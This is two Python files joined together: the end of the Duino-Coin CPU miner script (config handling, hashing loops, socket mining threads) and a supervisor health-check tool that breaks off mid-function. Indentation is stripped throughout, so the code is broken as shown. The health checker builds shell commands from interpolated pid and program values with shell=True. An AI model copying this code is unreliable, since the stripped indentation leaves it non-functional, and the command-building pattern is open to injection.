# Check wheter efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check wheter threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
# Check wheter algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check wheter diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "MEDIUM"
# Check wheter donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 45,
"periodic_report": 60,
"discord_presence": "y"
}
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-PC-Miner"]["periodic_report"])
efficiency = (100 - float(efficiency)) * 0.01
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 1 too 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 1 too 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid: int,
accepted: int,
rejected: int,
requested_diff: str,
khashcount: int,
username: str,
efficiency: int,
rig_identiier: str,
algorithm: str,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS: str,
NODE_PORT: int):
# Mining section for every thread
start_time = time()
report_shares = 0
while True:
while True:
try:
retry_counter = 0
while True:
try:
if retry_counter >= 3:
debug_output(
'Error connecting after 3 retries, '
+ 'fetching new node IP')
NODE_ADDRESS, NODE_PORT = fetch_pools()
debug_output('Connecting to node ' +
str(NODE_ADDRESS) + ":" + str(NODE_PORT))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if server_version:
break
except Exception as e:
retry_counter += 1
pretty_print("net0",
" Error connecting to mining node: "
+ str(e)
+ ", retrying in 5s",
"error")
sleep(5)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
if threadid == 0:
if float(server_version) <= float(MINER_VER):
# Miner is up-to-date
pretty_print(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(server_version)
+ ", node: "
+ str(NODE_ADDRESS)
+ ":"
+ str(NODE_PORT)
+ ")",
"success")
else:
# Miner is outdated
pretty_print(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
sleep(5)
break
except Exception as e:
# Socket connection error
pretty_print(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
pretty_print(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
pretty_print("cpu" + str(threadid),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all thrads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
pretty_print("sys0",
" " +
getString("max_hashrate_notice"),
"warning")
diff = get_prefix(diff)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ⛏"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ⛏"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = accepted.value - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
totalhashrate,
uptime)
start_time = time()
break
break
except Exception as e:
pretty_print(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" Periodic mining report (BETA): "
+ Fore.RESET
+ Style.NORMAL
+ "\n\t\t‖ During the last "
+ str(seconds)
+ " seconds"
+ "\n\t\t‖ You've mined "
+ str(shares)
+ " shares ("
+ str(round(shares/seconds, 1))
+ " shares/s)"
+ "\n\t\t‖ With the hashrate of "
+ str(int(hashrate)) + " kH/s"
+ "\n\t\t‖ In this time period, you've solved "
+ str(int(hashrate*seconds))
+ " hashes"
+ "\n\t\t‖ Total miner uptime: "
+ str(uptime), "success")
def pretty_print(message_type, message, state):
# Prints colored output messages
# Usb/net/sys background
if message_type.startswith("net"):
background = Back.BLUE
elif message_type.startswith("cpu"):
background = Back.YELLOW
if message_type.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(5).decode()
except:
continue
if server_version == b'':
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(4)
return ready_connections[0].getpeername()[1]
def fetch_pools():
while True:
pretty_print("net0",
" "
+ getString("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
pretty_print("net0",
" Retrieved mining node: "
+ Fore.RESET
+ Style.NORMAL
+ str(response["name"]),
"success")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
title(getString("duco_python_miner") + str(MINER_VER) + ")")
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
pretty_print(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
pretty_print(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except:
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS,
NODE_PORT))
thread[x].start()
if x > 4 and x % 4 == 0:
# Don't launch burst of threads
# to not get banned
sleep(5)
else:
sleep(0.1)
except Exception as e:
pretty_print(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
healthCheck.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2020-06-05
# @Author : lework
# @Desc : 针对supervisor的应用进行健康检查
# @Version : 1.5
import os
import sys
import time
import json
import yaml
import base64
import socket
import signal
import smtplib
import datetime
import platform
import threading
import subprocess
from email.header import Header
from email.mime.text import MIMEText
from collections import namedtuple
from supervisor.xmlrpc import SupervisorTransport
PY3 = sys.version_info[0] == 3
if PY3:
import http.client as httplib
from xmlrpc.client import Transport, ServerProxy, Fault
def iterkeys(d, **kw):
return iter(d.keys(**kw))
def iteritems(d, **kw):
return iter(d.items(**kw))
else:
import httplib
from xmlrpclib import Transport, ServerProxy, Fault
def iterkeys(d, **kw):
return d.iterkeys(**kw)
def iteritems(d, **kw):
return d.iteritems(**kw)
def shell(cmd):
"""
执行系统命令
:param cmd:
:return: (exitcode, stdout, stderr)
"""
# with os.popen(cmd) as f:
# return f.read()
env_to_pass = dict(os.environ)
proc = subprocess.Popen(cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env_to_pass)
proc.wait()
return (proc.returncode,) + proc.communicate()
def get_proc_cpu(pid):
"""
获取进程CPU使用率
:param pid:
:return:
"""
pscommand = 'ps -opcpu= -p %s'
_, data, _ = shell(pscommand % pid)
if not data:
# 未获取到数据值,或者没有此pid信息
return None
try:
cpu_utilization = data.strip()
cpu_utilization = float(cpu_utilization)
except ValueError:
# 获取的结果不包含数据,或者无法识别cpu_utilization
return None
return cpu_utilization
def get_proc_rss(pid, cumulative=False):
"""
获取进程内存使用
:param pid:
:param cumulative:
:return:
"""
pscommand = 'ps -orss= -p %s'
pstreecommand = 'ps ax -o "pid= ppid= rss="'
ProcInfo = namedtuple('ProcInfo', ['pid', 'ppid', 'rss'])
def find_children(parent_pid, procs):
# 找出进程的子进程信息
children = []
for proc in procs:
pid, ppid, rss = proc
if ppid == parent_pid:
children.append(proc)
children.extend(find_children(pid, procs))
return children
if cumulative:
# 统计进程的子进程rss
_, data, _ = shell(pstreecommand)
data = data.strip()
procs = []
for line in data.splitlines():
p_pid, p_ppid, p_rss = map(int, line.split())
procs.append(ProcInfo(pid=p_pid, ppid=p_ppid, rss=p_rss))
# 计算rss
try:
parent_proc = [p for p in procs if p.pid == pid][0]
children = find_children(pid, procs)
tree = [parent_proc] + children
rss = sum(map(int, [p.rss for p in tree]))
except (ValueError, IndexError):
# 计算错误时,返回None
return None
else:
_, data, _ = shell(pscommand % pid)
if not data:
# 未获取到数据值,或者没有此pid信息
return None
try:
rss = data.strip()
rss = int(rss)
except ValueError:
# 获取的结果不包含数据,或者无法识别rss
return None
rss = rss / 1024 # rss 的单位是 KB, 这里返回MB单位
return rss
class WorkerThread(threading.Thread):
"""
自定义Thread,记录线程的异常信息
"""
def __init__(self, target=None, args=(), kwargs={}, name=None):
super(WorkerThread, self).__init__(target=target, args=args, kwargs=kwargs, name=name)
self._target = target
self._args = args
self._kwargs = kwargs
self.exception = None
def run(self):
try:
if self._target:
self._target(*self._args, **self._kwargs)
except Exception as e:
# 记录线程异常
self.exception = sys.exc_info()
finally:
del self._target, self._args, self._kwargs
def get_exception(self):
return self.exception
class HealthCheck(object):
def __init__(self, config):
"""
初始化配置
:param config:
"""
self.mail_config = None
self.wechat_config = None
self.supervisord_url = 'unix:///var/run/supervisor.sock'
if 'config' in config:
self.mail_config = config['config'].get('mail')
self.wechat_config = config['config'].get('wechat')
self.supervisord_url = config['config'].get('supervisordUrl', self.supervisord_url)
self.supervisord_user = config['config'].get('supervisordUser', None)
self.supervisord_pass = config['config'].get('supervisordPass', None)
config.pop('config')
self.program_config = config
# 只保留通知action
self.notice_action = ['email', 'wechat']
self.periodSeconds = 5
self.failureThreshold = 3
self.successThreshold = 1
self.initialDelaySeconds = 1
self.sendResolved = False
self.max_rss = 1024
self.cumulative = False
self.max_cpu = 90
def get_supervisord_conn(self):
"""
获取supervisor的连接
:return:
"""
transport = SupervisorTransport(self.supervisord_user, self.supervisord_pass, self.supervisord_url)
s = ServerProxy('http://127.0.0.1', transport=transport)
return s
def get_pid(self, program, kind, pid_file):
"""
获取进程pid
:param program:
:param kind:
:param pid_file:
:return:
"""
pid = 0
err = ''
if kind == 'supervisor':
# 通过supervisor程序获取pid
try:
s = self.get_supervisord_conn()
info = s.supervisor.getProcessInfo(program)
pid = info.get('pid')
err = info.get('description')
except Exception as e:
self.log(program, "PID: Can't get pid from supervisor %s ", e)
elif kind == 'name':
# 通过进程名称获取pid
pscommand = "ps -A -o pid,cmd | grep '[%s]%s' | awk '{print $1}' | head -1"
exitcode, stdout, stderr = shell(pscommand % (program[0], program[1:]))
if exitcode == 0:
pid = stdout.strip()
else:
self.log(program, "PID: Can't get pid from name %s ", stderr)
pid = 0
err = stderr
elif kind == 'file':
# 通过文件获取pid
if pid_file:
try:
with open(pid_file) as f:
pid = f.read().strip()
except Exception as e:
self.log(program, "PID: Can't get pid from file %s ", e)
err = "Can't get pid from file"
else:
err = "PID: pid file not set."
self.log(program, err)
if not pid:
pid = 0
return pid, err
def log(self, program, msg, *args):
"""
写信息到 STDERR.
:param program:
:param msg:
:param args:
:return:
"""
curr_dt = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
sys.stderr.write(
'%s [%s] %s\n' % (curr_dt, program, msg % args,))
sys.stderr.flush()
def check(self, config):
"""
检查主函数
:param config:
:return:
"""
check_state = {}
program = config.get('program')
periodSeconds = config.get('periodSeconds', self.periodSeconds)
failureThreshold = config.get('failureThreshold', self.failureThreshold)
successThreshold = config.get('successThreshold', self.successThreshold)
initialDelaySeconds = config.get('initialDelaySeconds', self.initialDelaySeconds)
sendResolved = config.get('sendResolved', self.sendResolved)
action_type = config.get('action', 'restart')
check_type = config.get('type', 'http').lower()
if check_type == 'http':
check_method = self.http_check
elif check_type == 'tcp':
check_method = self.tcp_check
elif check_type == 'mem':
check_method = self.mem_check
elif check_type == 'cpu':
check_method = self.cpu_check
while 1:
if program not in check_state:
check_state[program] = {
'periodSeconds': 1,
'failure': 0,
'success': 0,
'action': False
}
self.log(program, '[CONFIG]: %s', config)
time.sleep(initialDelaySeconds)
# self.log(program, '%s check state: %s', check_type, json.dumps(check_state[program]))
if check_state[program]['periodSeconds'] % periodSeconds == 0:
check_result = check_method(config)
check_status = check_result.get('status', None)
check_info = check_result.get('info', '')
self.log(program, '[%s check]: info(%s) state(%s)', check_type.upper(), check_info, check_status)
if check_status == 'failure':
check_state[program]['failure'] += 1
elif check_status == 'success':
check_state[program]['success'] += 1
# 先判断成功次数
if check_state[program]['success'] >= successThreshold:
# 只有开启恢复通知和检测失败并且执行操作后,才可以发送恢复通知
if sendResolved and check_state[program]['action']:
send_action = ','.join(list(set(action_type.split(',')) & set(self.notice_action)))
self.log(program, '[Resolved] Use %s.', send_action)
action_param = {
'check_status': check_status,
'action_type': send_action,
'msg': check_result.get('msg', '')
}
self.action(program, **action_param)
# 成功后,将项目状态初始化
check_state[program]['failure'] = 0
check_state[program]['success'] = 0
check_state[program]['action'] = False
# 再判断失败次数
if check_state[program]['failure'] >= failureThreshold:
# 失败后, 只触发一次action, 或者检测错误数可以整除2倍periodSeconds与initialDelaySeconds时触发(避免重启失败导致服务一直不可用)
if not check_state[program]['action'] or (
check_state[program]['failure'] != 0 and check_state[program]['failure'] % (
(periodSeconds + initialDelaySeconds) * 2) == 0):
action_param = {
'config': config,
'action_type': action_type,
'check_status': check_status,
'msg': check_result.get('msg', '')
}
self.action(program, **action_param)
check_state[program]['action'] = True
# 间隔时间清0
check_state[program]['periodSeconds'] = 0
time.sleep(1)
check_state[program]['periodSeconds'] += 1
def http_check(self, config):
"""
用于检查http连接
:param config:
:return: dict
"""
program = config.get('program')
config_host = config.get('host', 'localhost')
config_path = config.get('path', '/')
config_port = config.get('port', '80')
config_method = config.get('method', 'GET')
config_timeoutSeconds = config.get('timeoutSeconds', 3)
config_body = config.get('body', '')
config_json = config.get('json', '')
config_hearders = config.get('hearders', '')
config_username = config.get('username', '')
config_password = config.get('password', '')
HEADERS = {'User-Agent': 'leops http_check'}
headers = HEADERS.copy()
if config_hearders:
try:
headers.update(json.loads(config_hearders))
except Exception as e:
self.log(program, '[http_check]: config_headers not loads: %s , %s', config_hearders, e)
if config_json:
headers['Content-Type'] = 'application/json'
if config_username and config_password:
auth_str = '%s:%s' % (config_username, config_password)
headers['Authorization'] = 'Basic %s' % base64.b64encode(auth_str.encode()).decode()
if config_json:
try:
config_body = json.dumps(config_json)
except Exception as e:
self.log(program, '[http_check]: config_json not loads: %s , %s', json, e)
check_info = '%s %s %s %s %s %s' % (config_host, config_port, config_path, config_method,
config_body, headers)
try:
httpClient = httplib.HTTPConnection(config_host, config_port, timeout=config_timeoutSeconds)
httpClient.request(config_method, config_path, config_body, headers=headers)
res = httpClient.getresponse()
except Exception as e:
self.log(program, '[http_check]: conn error, %s', e)
return {'status': 'failure', 'msg': '[http_check] %s' % e, 'info': check_info}
finally:
if httpClient:
httpClient.close()
if res.status != httplib.OK:
return {'status': 'failure', 'msg': '[http_check] return code %s' % res.status, 'info': check_info}
return {'status': 'success', 'msg': '[http_check] return code %s' % res.status, 'info': check_info}
def tcp_check(self, config):
"""
用于检查TCP连接
:param config:
:return: dict
"""
program = config.get('program')
host = config.get('host', 'localhost')
port = config.get('port', 80)
timeoutSeconds = config.get('timeoutSeconds', 3)
check_info = '%s %s' % (host, port)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeoutSeconds)
sock.connect((host, port))
sock.close()
except Exception as e:
self.log(program, '[tcp_check]: conn error, %s', e)
return {'status': 'failure', 'msg': '[tcp_check] %s' % e, 'info': check_info}
return {'status': 'success', 'msg': '[tcp_check] connection succeeded', 'info': check_info}
def mem_check(self, config):
"""
用于检查进程内存
:param config:
:return: dict
"""
program = config.get('program')
max_rss = config.get('maxRss', self.max_rss)
cumulative = config.get('cumulative', self.cumulative)
pid_get = config.get('pidGet', 'supervisor')
pid_file = config.get('pidFile', )
check_info = 'max_rss:%sMB cumulative:%s' % (max_rss, cumulative)
pid, err = self.get_pid(program, pid_get, pid_file)
if pid == 0:
self.log(program, '[mem_check]: check error, program not starting.')
return {'status': 'failure',
'msg': '[mem_check] program not starting, message: %s.' % err,
'info': check_info}
now_rss = get_proc_rss(pid, cumulative)
check_info = '%s now_rss:%sMB pid:%s' % (check_info, now_rss, pid)
if now_rss >= int(max_rss):
return {'status': 'failure', 'msg': '[mem_check] max_rss(%sMB) now_rss(%sMB)' % (max_rss, now_rss),
'info': check_info}
return {'status': 'success', 'msg': '[mem_check] max_rss(%sMB) now_rss(%sMB)' % (max_rss, now_rss),
'info': check_info}
def cpu_check(self, config):
"""
用于检查进程CPU
:param config:
:return: dict
"""
program = config.get('program')
max_cpu = config.get('maxCpu', self.max_cpu)
pid_get = config.get('pidGet', 'supervisor')
pid_file = config.get('pidFile', )
check_info = 'max_cpu:{cpu}%'.format(cpu=max_cpu)
pid, err = self.get_pid(program, pid_get, pid_file)
if pid == 0:
self.log(program, '[cpu_check]: check error, program not starting.')
return {'status': 'failure',
'msg': '[cpu_check] program not starting, message: %s.' % err,
'info': check_info}
now_cpu = get_proc_cpu(pid)
check_info = '{info} now_cpu:{now}% pid:{pid}'.format(info=check_info, now=now_cpu, pid=pid)
if now_cpu >= int(max_cpu):
return {'status': 'failure',
'msg': '[cpu_check] max_cpu({max_cpu}%) now_cpu({now}%)'.format(max_cpu=max_cpu, now=now_cpu),
'info': check_info}
return {'status': 'success',
'msg': '[cpu_check] max_cpu({max_cpu}%) now_cpu({now}%)'.format(max_cpu=max_cpu, now=now_cpu),
'info': check_info}
def action(self, program, **args):
"""
执行动作
:param program:
:param args:
:return: None
"""
action_type = args.get('action_type')
msg = args.get('msg')
